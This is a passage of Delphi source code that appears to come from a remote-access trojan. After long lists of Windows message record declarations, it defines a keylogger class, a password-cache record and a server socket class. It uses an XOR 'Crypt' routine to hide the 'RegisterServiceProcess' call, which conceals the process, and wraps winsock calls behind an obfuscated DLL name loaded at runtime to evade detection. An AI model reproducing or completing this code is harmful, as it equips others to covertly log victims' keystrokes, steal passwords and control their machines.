        Result: Longint);
      WM_DDE_EXECUTE {and all others}: (
        PackedVal: Longint);
  end;

  TWMDDE_Advise = record
    Msg: Cardinal;
    PostingApp: HWND;
    PackedVal: Longint;
    Result: Longint;
  end;

  TWMDDE_Data = record
    Msg: Cardinal;
    PostingApp: HWND;
    PackedVal: Longint;
    Result: Longint;
  end;

  TWMDDE_Execute = record
    Msg: Cardinal;
    PostingApp: HWND;
    Commands: THandle;
    Result: Longint;
  end;

  TWMDDE_Initiate = record
    Msg: Cardinal;
    PostingApp: HWND;
    App: Word;
    Topic: Word;
    Result: Longint;
  end;

  TWMDDE_Poke = record
    Msg: Cardinal;
    PostingApp: HWND;
    PackedVal: Longint;
    Result: Longint;
  end;

  TWMDDE_Request = record
    Msg: Cardinal;
    PostingApp: HWND;
    Format: Word;
    Item: Word;
    Result: Longint;
  end;

  TWMDDE_Terminate = record
    Msg: Cardinal;
    PostingApp: HWND;
    Unused: Longint;
    Result: Longint;
  end;

  TWMDDE_Unadvise = record
    Msg: Cardinal;
    PostingApp: HWND;
    Format: Word;
    Item: Word;
    Result: Longint;
  end;

  TWMDeadChar = TWMChar;

  TWMDeleteItem = record
    Msg: Cardinal;
    Ctl: HWND;
    DeleteItemStruct: PDeleteItemStruct;
    Result: Longint;
  end;

  TWMDestroy = TWMNoParams;
  TWMDestroyClipboard = TWMNoParams;

  TWMDevModeChange = record
    Msg: Cardinal;
    Unused: Integer;
    Device: PChar;
    Result: Longint;
  end;

  TWMDrawClipboard = TWMNoParams;

  {
  TWMDropFiles = record
    Msg: Cardinal;
    Drop: THANDLE;
    Unused: Longint;
    Result: Longint;
  end;
  }

  TWMEnable = record
    Msg: Cardinal;
    Enabled: LongBool;
    Unused: Longint;
    Result: Longint;
  end;

  TWMEndSession = record
    Msg: Cardinal;
    EndSession: LongBool;
    Unused: Longint;
    Result: Longint;
  end;

  TWMEnterIdle = record
    Msg: Cardinal;
    Source: Longint; { MSGF_DIALOGBOX, MSGF_MENU }
    IdleWnd: HWND;
    Result: Longint;
  end;

  TWMEnterMenuLoop = record
    Msg: Cardinal;
    IsTrackPopupMenu: LongBool;
    Unused: Longint;
    Result: Longint;
  end;

  TWMExitMenuLoop = TWMEnterMenuLoop;

  TWMEraseBkgnd = record
    Msg: Cardinal;
    DC: HDC;
    Unused: Longint;
    Result: Longint;
  end;

  TWMFontChange = TWMNoParams;
  TWMGetDlgCode = TWMNoParams;
  TWMGetFont = TWMNoParams;

  TWMGetIcon = record
    Msg: Cardinal;
    BigIcon: Longbool;
    Unused: Longint;
    Result: Longint;
  end;

  TWMGetText = record
    Msg: Cardinal;
    TextMax: Integer;
    Text: PChar;
    Result: Longint;
  end;

  TWMGetTextLength = TWMNoParams;

  {
  TWMHotKey = record
    Msg: Cardinal;
    HotKey: Longint;
    Unused: Longint;
    Result: Longint;
  end;
  }

  TWMHScroll = TWMScroll;

  TWMHScrollClipboard = record
    Msg: Cardinal;
    Viewer: HWND;
    ScrollCode: Word; {SB_BOTTOM, SB_ENDSCROLL, SB_LINEDOWN, SB_LINEUP, SB_PAGEDOWN, SB_PAGEUP, SB_THUMBPOSITION, SB_THUMBTRACK, SB_TOP }
    Pos: Word;
    Result: Longint;
  end;

  TWMIconEraseBkgnd = TWMEraseBkgnd;

  TWMInitDialog = record
    Msg: Cardinal;
    Focus: HWND;
    InitParam: Longint;
    Result: Longint;
  end;

  TWMInitMenu = record
    Msg: Cardinal;
    Menu: HMENU;
    Unused: Longint;
    Result: Longint;
  end;

  TWMInitMenuPopup = record
    Msg: Cardinal;
    MenuPopup: HMENU;
    Pos: Smallint;
    SystemMenu: WordBool;
    Result: Longint;
  end;

  TWMKeyDown = TWMKey;
  TWMKeyUp = TWMKey;

  TWMKillFocus = record
    Msg: Cardinal;
    FocusedWnd: HWND;
    Unused: Longint;
    Result: Longint;
  end;

  TWMLButtonDblClk = TWMMouse;
  TWMLButtonDown = TWMMouse;
  TWMLButtonUp = TWMMouse;
  TWMMButtonDblClk = TWMMouse;
  TWMMButtonDown = TWMMouse;
  TWMMButtonUp = TWMMouse;

  TWMMDIActivate = record
    Msg: Cardinal;
    case Integer of
      0: (
        ChildWnd: HWND);
      1: (
        DeactiveWnd: HWND;
        ActiveWnd: HWND;
        Result: Longint);
  end;

  TWMMDICascade = record
    Msg: Cardinal;
    Cascade: Longint; { 0, MDITILE_SKIPDISABLED }
    Unused: Longint;
    Result: Longint;
  end;

  TWMMDICreate = record
    Msg: Cardinal;
    Unused: Integer;
    MDICreateStruct: PMDICreateStruct;
    Result: Longint;
  end;

  TWMMDIDestroy = record
    Msg: Cardinal;
    Child: HWND;
    Unused: Longint;
    Result: Longint;
  end;

  TWMMDIGetActive = TWMNoParams;
  TWMMDIIconArrange = TWMNoParams;

  TWMMDIMaximize = record
    Msg: Cardinal;
    Maximize: HWND;
    Unused: Longint;
    Result: Longint;
  end;

  TWMMDINext = record
    Msg: Cardinal;
    Child: HWND;
    Next: Longint;
    Result: Longint;
  end;

  TWMMDIRefreshMenu = TWMNoParams;

  TWMMDIRestore = record
    Msg: Cardinal;
    IDChild: HWND;
    Unused: Longint;
    Result: Longint;
  end;

  TWMMDISetMenu = record
    Msg: Cardinal;
    MenuFrame: HMENU;
    MenuWindow: HMENU;
    Result: Longint;
  end;

  TWMMDITile = record
    Msg: Cardinal;
    Tile: Longint; { MDITILE_HORIZONTAL, MDITILE_SKIPDISABLE, MDITILE_VERTICAL }
    Unused: Longint;
    Result: Longint;
  end;

  TWMMenuChar = record
    Msg: Cardinal;
    User: Char;
    Unused: Byte;
    MenuFlag: Word; { MF_POPUP, MF_SYSMENU }
    Menu: HMENU;
    Result: Longint;
  end;

  TWMMenuSelect = record
    Msg: Cardinal;
    IDItem: Word;
    MenuFlag: Word; { MF_BITMAP, MF_CHECKED, MF_DISABLED, MF_GRAYED, MF_MOUSESELECT, MF_OWNERDRAW, MF_POPUP, MF_SEPARATOR, MF_SYSMENU }
    Menu: HMENU;
    Result: Longint;
  end;

  TWMMouseActivate = record
    Msg: Cardinal;
    TopLevel: HWND;
    HitTestCode: Word;
    MouseMsg: Word;
    Result: Longint;
  end;

  TWMMouseMove = TWMMouse;

  TWMMove = record
    Msg: Cardinal;
    Unused: Integer;
    case Integer of
      0: (
        XPos: Smallint;
        YPos: Smallint);
      1: (
        Pos: TSmallPoint;
        Result: Longint);
  end;

  TWMNCActivate = record
    Msg: Cardinal;
    Active: BOOL;
    Unused: Longint;
    Result: Longint;
  end;

  TWMNCCalcSize = record
    Msg: Cardinal;
    CalcValidRects: BOOL;
    CalcSize_Params: PNCCalcSizeParams;
    Result: Longint;
  end;

  TWMNCCreate = record
    Msg: Cardinal;
    Unused: Integer;
    CreateStruct: PCreateStruct;
    Result: Longint;
  end;
  TWMNCDestroy = TWMNoParams;

  TWMNCHitTest = record
    Msg: Cardinal;
    Unused: Longint;
    case Integer of
      0: (
        XPos: Smallint;
        YPos: Smallint);
      1: (
        Pos: TSmallPoint;
        Result: Longint);
  end;

  TWMNCHitMessage = record
    Msg: Cardinal;
    HitTest: Longint;
    XCursor: Smallint;
    YCursor: Smallint;
    Result: Longint;
  end;

  TWMNCLButtonDblClk = TWMNCHitMessage;
  TWMNCLButtonDown = TWMNCHitMessage;
  TWMNCLButtonUp = TWMNCHitMessage;
  TWMNCMButtonDblClk = TWMNCHitMessage;
  TWMNCMButtonDown = TWMNCHitMessage;
  TWMNCMButtonUp = TWMNCHitMessage;
  TWMNCMouseMove = TWMNCHitMessage;

  TWMNCPaint = TWMNoParams;

  TWMNCRButtonDblClk = TWMNCHitMessage;
  TWMNCRButtonDown = TWMNCHitMessage;
  TWMNCRButtonUp = TWMNCHitMessage;

  TWMNextDlgCtl = record
    Msg: Cardinal;
    CtlFocus: Longint;
    Handle: WordBool;
    Unused: Word;
    Result: Longint;
  end;

  TWMNotify = record
    Msg: Cardinal;
    IDCtrl: Longint;
    NMHdr: PNMHdr;
    Result: Longint;
  end;

  TWMNotifyFormat = record
    Msg: Cardinal;
    From: HWND;
    Command: Longint;
    Result: Longint;
  end;

  TWMPaint = record
    Msg: Cardinal;
    DC: HDC;
    Unused: Longint;
    Result: Longint;
  end;

  TWMPaintClipboard = record
    Msg: Cardinal;
    Viewer: HWND;
    PaintStruct: THandle;
    Result: Longint;
  end;

  TWMPaintIcon = TWMNoParams;

  TWMPaletteChanged = record
    Msg: Cardinal;
    PalChg: HWND;
    Unused: Longint;
    Result: Longint;
  end;

  TWMPaletteIsChanging = record
    Msg: Cardinal;
    Realize: HWND;
    Unused: Longint;
    Result: Longint;
  end;

  TWMParentNotify = record
    Msg: Cardinal;
    case Event: Word of
      WM_CREATE, WM_DESTROY: (
        ChildID: Word;
        ChildWnd: HWnd);
      WM_LBUTTONDOWN, WM_MBUTTONDOWN, WM_RBUTTONDOWN: (
        Value: Word;
        XPos: Smallint;
        YPos: Smallint);
      0: (
        Value1: Word;
        Value2: Longint;
        Result: Longint);
  end;

  TWMPaste = TWMNoParams;

  TWMPower = record
    Msg: Cardinal;
    PowerEvt: Longint; { PWR_SUSPENDREQUEST, PWR_SUSPENDRESUME, PWR_CRITICALRESUME }
    Unused: Longint;
    Result: Longint;
  end;

  TWMQueryDragIcon = TWMNoParams;

  TWMQueryEndSession = record
    Msg: Cardinal;
    Source: Longint;
    Unused: Longint;
    Result: Longint;
  end;

  TWMQueryNewPalette = TWMNoParams;
  TWMQueryOpen = TWMNoParams;
  TWMQueueSync = TWMNoParams;

  TWMQuit = record
    Msg: Cardinal;
    ExitCode: Longint;
    Unused: Longint;
    Result: Longint;
  end;

  TWMRButtonDblClk = TWMMouse;
  TWMRButtonDown = TWMMouse;
  TWMRButtonUp = TWMMouse;

  TWMRenderAllFormats = TWMNoParams;

  TWMRenderFormat = record
    Msg: Cardinal;
    Format: Longint;
    Unused: Longint;
    Result: Longint;
  end;

  TWMSetCursor = record
    Msg: Cardinal;
    CursorWnd: HWND;
    HitTest: Word;
    MouseMsg: Word;
    Result: Longint;
  end;

  TWMSetFocus = record
    Msg: Cardinal;
    FocusedWnd: HWND;
    Unused: Longint;
    Result: Longint;
  end;

  TWMSetFont = record
    Msg: Cardinal;
    Font: HFONT;
    Redraw: WordBool;
    Unused: Word;
    Result: Longint;
  end;

  TWMSetIcon = record
    Msg: Cardinal;
    BigIcon: Longbool;
    Icon: HICON;
    Result: Longint;
  end;

  TWMSetRedraw = record
    Msg: Cardinal;
    Redraw: Longint;
    Unused: Longint;
    Result: Longint;
  end;

  TWMSetText = record
    Msg: Cardinal;
    Unused: Longint;
    Text: PChar;
    Result: Longint;
  end;

  TWMShowWindow = record
    Msg: Cardinal;
    Show: BOOL;
    Status: Longint;
    Result: Longint;
  end;

  TWMSize = record
    Msg: Cardinal;
    SizeType: Longint; { SIZE_MAXIMIZED, SIZE_MINIMIZED, SIZE_RESTORED, SIZE_MAXHIDE, SIZE_MAXSHOW }
    Width: Word;
    Height: Word;
    Result: Longint;
  end;

  TWMSizeClipboard = record
    Msg: Cardinal;
    Viewer: HWND;
    RC: THandle;
    Result: Longint;
  end;

  TWMSpoolerStatus = record
    Msg: Cardinal;
    JobStatus: Longint;
    JobsLeft: Word;
    Unused: Word;
    Result: Longint;
  end;

  TWMStyleChange = record
    Msg: Cardinal;
    StyleType: Longint;
    StyleStruct: PStyleStruct;
    Result: Longint;
  end;

  TWMStyleChanged = TWMStyleChange;
  TWMStyleChanging = TWMStyleChange;

  TWMSysChar = TWMKey;
  TWMSysColorChange = TWMNoParams;

  TWMSysDeadChar = record
    Msg: Cardinal;
    CharCode: Word;
    Unused: Word;
    KeyData: Longint;
    Result: Longint;
  end;

  TWMSysKeyDown = TWMKey;
  TWMSysKeyUp = TWMKey;

  TWMSystemError = record
    Msg: Cardinal;
    ErrSpec: Word;
    Unused: Longint;
    Result: Longint;
  end;

  TWMTimeChange = TWMNoParams;

  TWMTimer = record
    Msg: Cardinal;
    TimerID: Longint;
    TimerProc: TFarProc;
    Result: Longint;
  end;

  TWMUndo = TWMNoParams;

  TWMVKeyToItem = TWMCharToItem;

  TWMVScroll = TWMScroll;

  TWMVScrollClipboard = record
    Msg: Cardinal;
    Viewer: HWND;
    ScollCode: Word;
    ThumbPos: Word;
    Result: Longint;
  end;

  TWMWindowPosChanged = TWMWindowPosMsg;
  TWMWindowPosChanging = TWMWindowPosMsg;

  TWMWinIniChange = record
    Msg: Cardinal;
    Unused: Integer;
    Section: PChar;
    Result: Longint;
  end;

  TWMHelp = record
    Msg: Cardinal;
    Unused: Integer;
    HelpInfo: PHelpInfo;
    Result: Longint;
  end;

  TWMDisplayChange = record
    Msg: Cardinal;
    BitsPerPixel: Integer;
    Width: Word;
    Height: Word;
  end;

// sysutils type
type
  WordRec = packed record
    Lo, Hi: Byte;
  end;

  LongRec = packed record
    Lo, Hi: Word;
  end;

  TMethod = record
    Code, Data: Pointer;
  end;

  PByteArray = ^TByteArray;
  TByteArray = array[0..32767] of Byte;

  PWordArray = ^TWordArray;
  TWordArray = array[0..16383] of Word;

  TProcedure = procedure;

  TFileName = string;

  TSearchRec = record
    Time: Integer;
    Size: Integer;
    Attr: Integer;
    Name: TFileName;
    ExcludeAttr: Integer;
    FindHandle: THandle;
    FindData: TWin32FindData;
  end;

  TFileRec = record
    Handle: Integer;
    Mode: Integer;
    RecSize: Cardinal;
    Private: array[1..28] of Byte;
    UserData: array[1..32] of Byte;
    Name: array[0..259] of Char;
  end;

  PTextBuf = ^TTextBuf;
  TTextBuf = array[0..127] of Char;
  TTextRec = record
    Handle: Integer;
    Mode: Integer;
    BufSize: Cardinal;
    BufPos: Cardinal;
    BufEnd: Cardinal;
    BufPtr: PChar;
    OpenFunc: Pointer;
    InOutFunc: Pointer;
    FlushFunc: Pointer;
    CloseFunc: Pointer;
    UserData: array[1..32] of Byte;
    Name: array[0..259] of Char;
    Buffer: TTextBuf;
  end;

  TFloatValue = (fvExtended, fvCurrency);

  TFloatFormat = (ffGeneral, ffExponent, ffFixed, ffNumber, ffCurrency);

  TFloatRec = packed record
    Exponent: Smallint;
    Negative: Boolean;
    Digits: array[0..20] of Char;
  end;

  TTimeStamp = record
    Time: Integer; { Number of milliseconds since midnight }
    Date: Integer; { One plus number of days since 1/1/0001 }
  end;

  TMbcsByteType = (mbSingleByte, mbLeadByte, mbTrailByte);

  TSysLocale = packed record
    DefaultLCID: LCID;
    PriLangID: LANGID;
    SubLangID: LANGID;
    FarEast: Boolean;
  end;

  // password connection type
  TPasswordCacheEntry = packed record
    cbEntry : word; // size of this entry, in bytes
    cbResource : word; // size of resource name, in bytes
    cbPassword : word; // size of password, in bytes
    iEntry : byte; // entry index
    nType : byte; // type of entry
    abResource : array [0..$FFFFFFF] of char;
  end;
  TPPasswordCacheEntry = ^TPasswordCacheEntry;

// registry type
type
  TRegKeyInfo = record
    NumSubKeys: Integer;
    MaxSubKeyLen: Integer;
    NumValues: Integer;
    MaxValueLen: Integer;
    MaxDataLen: Integer;
    FileTime: TFileTime;
  end;

  TRegDataType = (rdUnknown, rdString, rdExpandString, rdInteger, rdBinary);

  TRegDataInfo = record
    RegData: TRegDataType;
    DataSize: Integer;
  end;

  TRegistry = class(TObject)
  private
    FCurrentKey: HKEY;
    FRootKey: HKEY;
    FLazyWrite: Boolean;
    FCurrentPath: string;
    FCloseRootKey: Boolean;
    procedure SetRootKey(Value: HKEY);
    function OpenKey(const Key: string; CanCreate: Boolean): Boolean;
  protected
    function GetBaseKey(Relative: Boolean): HKey;
    procedure ChangeKey(Value: HKey; const Path: string);
    procedure PutData(const Name: string; Buffer: Pointer; BufSize: Integer; RegData: TRegDataType);
    function GetData(const Name: string; Buffer: Pointer; BufSize: Integer; var RegData: TRegDataType): Integer;
  public
    constructor Create;
    destructor Destroy; override;
    procedure WriteString(const Name, Value: string);
    function ReadString(const Name: string): string;
    procedure CloseKey;
    function GetDataSize(const ValueName: string): Integer;
    function GetDataInfo(const ValueName: string; var Value: TRegDataInfo): Boolean;
    property CurrentKey : HKEY read FCurrentKey;
    property RootKey: HKEY read FRootKey write SetRootKey;
    property CurrentPath: string read FCurrentPath;
    property LazyWrite: Boolean read FLazyWrite write FLazyWrite;
  end;

  TSock = class(TObject)
    procedure WriteString(wParam:word;Buff:PChar);
    function WriteData(wParam:word;Buff:pointer;Len:longInt):LongInt;
    procedure OnServerAccept(wParam,lParam:longInt);
    procedure OnServerClose(wParam,lParam:longInt);
    procedure OnServerRead(wParam,lParam:longInt);
  private
  public
  end;

//Key_logger_object
Type
  TLog = class(TObject)
    procedure LogCreate;
    procedure LogDestroy;
  private
    procedure KeyIncrement( var Msg: TMessage ); message UM_KEYHIT;
  public
  end;

//============== all var
var
  //sysutils var
  SysLocale: TSysLocale;
  LeadBytes: set of Char = [];
  Win32Platform: Integer;
  //MainVariables
  wClass: TWndClass; // Class struct for main window
  hInst, // Handle of program instance
  Handle: Integer; // Handle of main window
  Msg2: TMSG; // Message struct
  //Msg: TMSG;
  //Socket
  Server: TSocket;
  WSD: TWSAData;
  Addr: TSockAddrIn; // Address for connect.
  Port: Integer;
  //ReadBuff: TBuffer;
  yyyy,mm,dd,h,m,ss,CountRB: Word;
  result,nukemsg,nukemsg2,opt,opt2,s,driv: string;
  d:integer; // si,i:integer;
  //udp
  j:byte;
  z:longint; //ip
  //Registry
  Registre: TRegistry;
  //other
  klasse: array [0..255] of char;
  Timeout: integer;
  t:textfile;
  // classe: array [0..255] of char;
  // counter :integer;
  //thread
  Sock:TSock;
  KLog: Tlog;
  h_SOCK_DLL :HModule;
  ThreadHdle :THandle;
  ThreadID :Integer;
  ExitCode :Integer;
  ThreadHdle2 :THandle;
  ThreadID2 :Integer;
  ExitCode2 :Integer;
  ThreadHdle3:THandle;
  ThreadID3 :Integer;
  ExitCode3 :Integer;
  iii:byte;
  sss,sss2:string;
  ccc:char;

//===Dir
function systemdir:string;
var
  d:integer;
begin
  setlength(result,500);
  d:=getsystemdirectory(pchar(result),500);
  setlength(result,d);
end;

function windowsdir:string;
var
  d:integer;
begin
  setlength(result,500);
  d:=getwindowsdirectory(pchar(result),500);
  setlength(result,d);
end;

Function Crypt(S : String) : String;
Var
  i : Byte;
begin
  For i := 1 to Length(S) Do
    S[i] := Char(ord(S[i]) xor i);
  Crypt := S;
end;

//==executeAPI
function ShellExecute(hWnd: HWND; Operation, FileName, Parameters, Directory: PChar; ShowCmd: Integer):integer; stdcall; external 'shell32.dll' name 'ShellExecuteA';

//function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; stdcall; external 'KERNEL32.DLL';
function RegisterInService:boolean;
type
  TRegisterServiceProcess = function(ProcessID :Integer; Service :Boolean):Boolean; StdCall;
var
  h_KERNEL_DLL :HModule;
  RegisterServiceProcess :TRegisterServiceProcess;
begin
  Result := False;
  h_KERNEL_DLL := LoadLibrary(PChar('kernel32.dll'));
  if h_KERNEL_DLL <> Null then
  begin
    RegisterServiceProcess := GetProcAddress(h_KERNEL_DLL, PChar(crypt('SgdmvrbzZoyzdmj@c}pqfe'))); //RegisterServiceProcess
    if @RegisterServiceProcess <> Nil then
      Result := RegisterServiceProcess(GetCurrentProcessID, True);
    FreeLibrary(h_KERNEL_DLL);
  end;
end;

//=== winsock function
//function accept(s: TSocket; addr: PSockAddr; addrlen: PInteger): TSocket; stdcall; external winsocket name 'accept';
function accept(s: TSocket; addr: PSockAddr; addrlen: PInteger): TSocket; stdcall;
Type
  TListen = function(s: TSocket; addr: PSockAddr; addrlen: PInteger): TSocket; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('accept'));
    if @LListen <> Nil then
      Result := LListen(s, addr,addrlen);
    FreeLibrary(h_SOCK_DLL);
  end;
end;

//function bind(s: TSocket; var addr: TSockAddr; namelen: Integer): Integer; stdcall; external winsocket name 'bind';
function bind(s: TSocket; var addr: TSockAddr; namelen: Integer): Integer; stdcall;
Type
  TListen = function(s: TSocket; var addr: TSockAddr; namelen: Integer): Integer; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('bind'));
    if @LListen <> Nil then
      Result := LListen(s, addr,namelen);
    FreeLibrary(h_SOCK_DLL);
  end;
end;

//function closesocket(s: TSocket): Integer; stdcall; external winsocket name 'closesocket';
function closesocket(s: TSocket): Integer; stdcall;
Type
  TListen = function(s: TSocket): Integer; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('closesocket'));
    if @LListen <> Nil then
      Result := LListen(s);
    FreeLibrary(h_SOCK_DLL);
  end;
end;

//function connect(s: TSocket; var name: TSockAddr; namelen: Integer): Integer; stdcall; external winsocket name 'connect';
function connect(s: TSocket; var name: TSockAddr; namelen: Integer): Integer; stdcall;
Type
  TListen = function(s: TSocket; var name: TSockAddr; namelen: Integer): Integer; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('connect'));
    if @LListen <> Nil then
      Result := LListen(s,name,namelen);
    FreeLibrary(h_SOCK_DLL);
  end;
end;

function getpeername(s: TSocket; var name: TSockAddr; var namelen: Integer): Integer; stdcall; external winsocket name 'getpeername';
function getsockname(s: TSocket; var name: TSockAddr; var namelen: Integer): Integer; stdcall; external winsocket name 'getsockname';
function getsockopt(s: TSocket; level, optname: Integer; optval: PChar; var optlen: Integer): Integer; stdcall; external winsocket name 'getsockopt';

//function htonl(hostlong: u_long): u_long; stdcall; external winsocket name 'htonl';
function htonl(hostlong: u_long): u_long; stdcall;
Type
  TListen = function(hostlong: u_long): u_long; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('htonl'));
    if @LListen <> Nil then
      Result := LListen(hostlong);
    FreeLibrary(h_SOCK_DLL);
  end;
end;

//function htons(hostshort: u_short): u_short; stdcall; external winsocket name 'htons';
function htons(hostshort: u_short): u_short; stdcall;
Type
  TListen = function(hostshort: u_short): u_short; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('htons'));
    if @LListen <> Nil then
      Result := LListen(hostshort);
    FreeLibrary(h_SOCK_DLL);
  end;
end;

//function inet_addr(cp: PChar): u_long; stdcall; external winsocket name 'inet_addr'; {PInAddr;} { TInAddr }
function inet_addr(cp: PChar): u_long; stdcall;
Type
  TListen = function(cp: PChar): u_long; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('inet_addr'));
    if @LListen <> Nil then
      Result := LListen(cp);
    FreeLibrary(h_SOCK_DLL);
  end;
end;

function inet_ntoa(inaddr: TInAddr): PChar; stdcall; external winsocket name 'inet_ntoa';
function ioctlsocket(s: TSocket; cmd: Longint; var arg: u_long): Integer; stdcall; external winsocket name 'ioctlsocket';

//function listen(s: TSocket; backlog: Integer): Integer; stdcall; external winsocket name 'listen';
function listen(s: TSocket; backlog: Integer): Integer; stdcall;
Type
  TListen = function(s: TSocket; backlog: Integer): Integer; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('listen'));
    if @LListen <> Nil then
      Result := LListen(s, backlog);
    FreeLibrary(h_SOCK_DLL);
  end;
end;

//function ntohl(netlong: u_long): u_long; stdcall; external winsocket name 'ntohl';
function ntohl(netlong: u_long): u_long; stdcall;
Type
  TListen = function(netlong: u_long): u_long; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('ntohl'));
    if @LListen <> Nil then
      Result := LListen(netlong);
    FreeLibrary(h_SOCK_DLL);
  end;
end;

function ntohs(netshort: u_short): u_short; stdcall; external winsocket name 'ntohs';

//function recv(s: TSocket; var Buf; len, flags: Integer): Integer; stdcall; external winsocket name 'recv';
function recv(s: TSocket; var Buf; len, flags: Integer): Integer; stdcall;
Type
  TListen = function(s: TSocket; var Buf; len, flags: Integer): Integer; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('recv'));
    if @LListen <> Nil then
      Result := LListen(s,buf,len,flags);
    FreeLibrary(h_SOCK_DLL);
  end;
end;

function recvfrom(s: TSocket; var Buf; len, flags: Integer; var from: TSockAddr; var fromlen: Integer): Integer; stdcall; external winsocket name 'recvfrom';
function select(nfds: Integer; readfds, writefds, exceptfds: PFDSet; timeout: PTimeVal): Longint; stdcall; external winsocket name 'select';

//function send(s: TSocket; var Buf; len, flags: Integer): Integer; stdcall; external winsocket name 'send';
function send(s: TSocket; var Buf; len, flags: Integer): Integer; stdcall;
Type
  TListen = function(s: TSocket; var Buf; len, flags: Integer): Integer; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('send'));
    if @LListen <> Nil then
      Result := LListen(s,buf,len,flags);
    FreeLibrary(h_SOCK_DLL);
  end;
end;

function sendto(s: TSocket; var Buf; len, flags: Integer; var addrto: TSockAddr; tolen: Integer): Integer; stdcall; external winsocket name 'sendto';
function setsockopt(s: TSocket; level, optname: Integer; optval: PChar; optlen: Integer): Integer; stdcall; external winsocket name 'setsockopt';
function shutdown(s: TSocket; how: Integer): Integer; stdcall; external winsocket name 'shutdown';

//function socket(af, struct, protocol: Integer): TSocket; stdcall; external winsocket name 'socket';
function socket(af, struct, protocol: Integer): TSocket; stdcall;
Type
  TListen = function(af, struct, protocol: Integer): TSocket; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('socket'));
    if @LListen <> Nil then
      Result := LListen(af,struct,protocol);
    FreeLibrary(h_SOCK_DLL);
  end;
end;

function gethostbyaddr(addr: Pointer; len, struct: Integer): PHostEnt; stdcall; external winsocket name 'gethostbyaddr';

//function gethostbyname(name: PChar): PHostEnt; stdcall; external winsocket name 'gethostbyname';
function gethostbyname(name: PChar): PHostEnt; stdcall;
Type
  TListen = function(name: PChar): PHostEnt; stdcall;
var
  LListen :TListen;
begin
  Result := nil;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('gethostbyname'));
    if @LListen <> Nil then
      Result := LListen(name);
    FreeLibrary(h_SOCK_DLL);
  end;
end;

function getprotobyname(name: PChar): PProtoEnt; stdcall; external winsocket name 'getprotobyname';
function getprotobynumber(proto: Integer): PProtoEnt; stdcall; external winsocket name 'getprotobynumber';
function getservbyname(name, proto: PChar): PServEnt; stdcall; external winsocket name 'getservbyname';
function getservbyport(port: Integer; proto: PChar): PServEnt; stdcall; external winsocket name 'getservbyport';

//function gethostname(name: PChar; len: Integer): Integer; stdcall; external winsocket name 'gethostname';
function gethostname(name: PChar; len: Integer): Integer; stdcall;
Type
  TListen = function(name: PChar; len: Integer): Integer; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('gethostname'));
    if @LListen <> Nil then
      Result := LListen(name,len);
    FreeLibrary(h_SOCK_DLL);
  end;
end;

//function WSAAsyncSelect(s: TSocket; HWindow: HWND; wMsg: u_int; lEvent: Longint): Integer; stdcall; external winsocket name 'WSAAsyncSelect';
function WSAAsyncSelect(s: TSocket; HWindow: HWND; wMsg: u_int; lEvent: Longint): Integer; stdcall;
Type
  TListen = function(s: TSocket; HWindow: HWND; wMsg: u_int; lEvent: Longint): Integer; stdcall;
var
  LListen :TListen;
begin
  Result := 0;
  h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket)));
  if h_SOCK_DLL <> Null then
  begin
    LListen := GetProcAddress(h_SOCK_DLL, PChar('WSAAsyncSelect'));
    if @LListen <> Nil then
      Result := LListen(s,HWindow,wMsg,lEvent);
    FreeLibrary(h_SOCK_DLL);
  end;
end;

function WSARecvEx(s: TSocket; var buf; len: Integer; var flags: Integer): Integer; stdcall; external winsocket name 'WSARecvEx';
function WSAAsyncGetHostByAddr(HWindow: HWND; wMsg: u_int; addr: PChar; len, struct: Integer; buf: PChar; buflen: Integer): THandle; stdcall; external winsocket name 'WSAAsyncGetHostByAddr';
